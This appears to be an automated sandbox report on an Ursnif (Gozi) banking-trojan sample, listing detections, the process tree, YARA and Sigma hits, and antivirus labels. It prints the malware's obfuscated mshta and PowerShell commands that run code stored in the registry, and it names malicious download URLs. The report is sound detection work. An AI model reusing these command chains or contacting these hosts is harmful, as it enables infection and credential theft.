Play interactive tour

Edit tour

Windows Analysis Report gozi.exe

Overview

General Information

Sample Name:	gozi.exe
Analysis ID:	551701
MD5:	8ee79738c37a919fdf38dc5a621556ce
SHA1:	ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256:	51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
Tags:	exegozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Tries to steal Mail credentials (via file / registry access)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Uses nslookup.exe to query domains

Writes or reads registry keys via WMI

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

.NET source code contains potential unpacker

Sigma detected: MSHTA Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Writes to foreign memory regions

Changes memory attributes in foreign processes to executable or writable

Uses ping.exe to check the status of other devices and networks

Modifies the prolog of user mode functions (user mode inline hooks)

Uses ping.exe to sleep

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Modifies the import address table of user mode modules (user mode IAT hooks)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Queries the installation date of Windows

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Searches for the Microsoft Outlook file path

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Compiles C# or VB.Net code

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Rundll32 Activity

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Enables debug privileges

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Csc.exe Source File Folder

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

gozi.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\gozi.exe" MD5: 8EE79738C37A919FDF38DC5A621556CE)

RegAsm.exe (PID: 5696 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

control.exe (PID: 5676 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 4364 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

mshta.exe (PID: 2928 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5700 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5664 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 2960 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 3640 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 4488 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5340 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)

RuntimeBroker.exe (PID: 4176 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 3200 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 6020 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
Process Memory Space: RegAsm.exe PID: 5696	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 6536	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: control.exe PID: 5676	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4364	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4084	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4176	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 49 entries

Unpacked PEs

Source	Rule	Description	Author
8.3.RegAsm.exe.330a4a0.0.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
8.3.RegAsm.exe.330a4a0.0.raw.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
8.3.RegAsm.exe.33b8f40.2.raw.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
8.3.RegAsm.exe.33894a0.1.raw.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\gozi.exe" , ParentImage: C:\Users\user\Desktop\gozi.exe, ParentProcessId: 6992, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5696

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5676, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 4364

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline, ProcessId: 6620

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\Desktop\gozi.exe" , ParentImage: C:\Users\user\Desktop\gozi.exe, ParentProcessId: 6992, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5696

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6536

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132864949359535906.6536.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH	Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: gozi.exe	Virustotal: Detection: 38%	Perma Link
Source: gozi.exe	Metadefender: Detection: 40%	Perma Link
Source: gozi.exe	ReversingLabs: Detection: 65%

Antivirus / Scanner detection for submitted sample

Show sources

Source: gozi.exe

Avira: detected

Machine Learning detection for sample

Show sources

Source: gozi.exe

Joe Sandbox ML: detected

Source: 8.0.RegAsm.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.32857b4.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.RegAsm.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.329b084.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A7479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

8_2_010A7479

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

Source: gozi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source:	Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

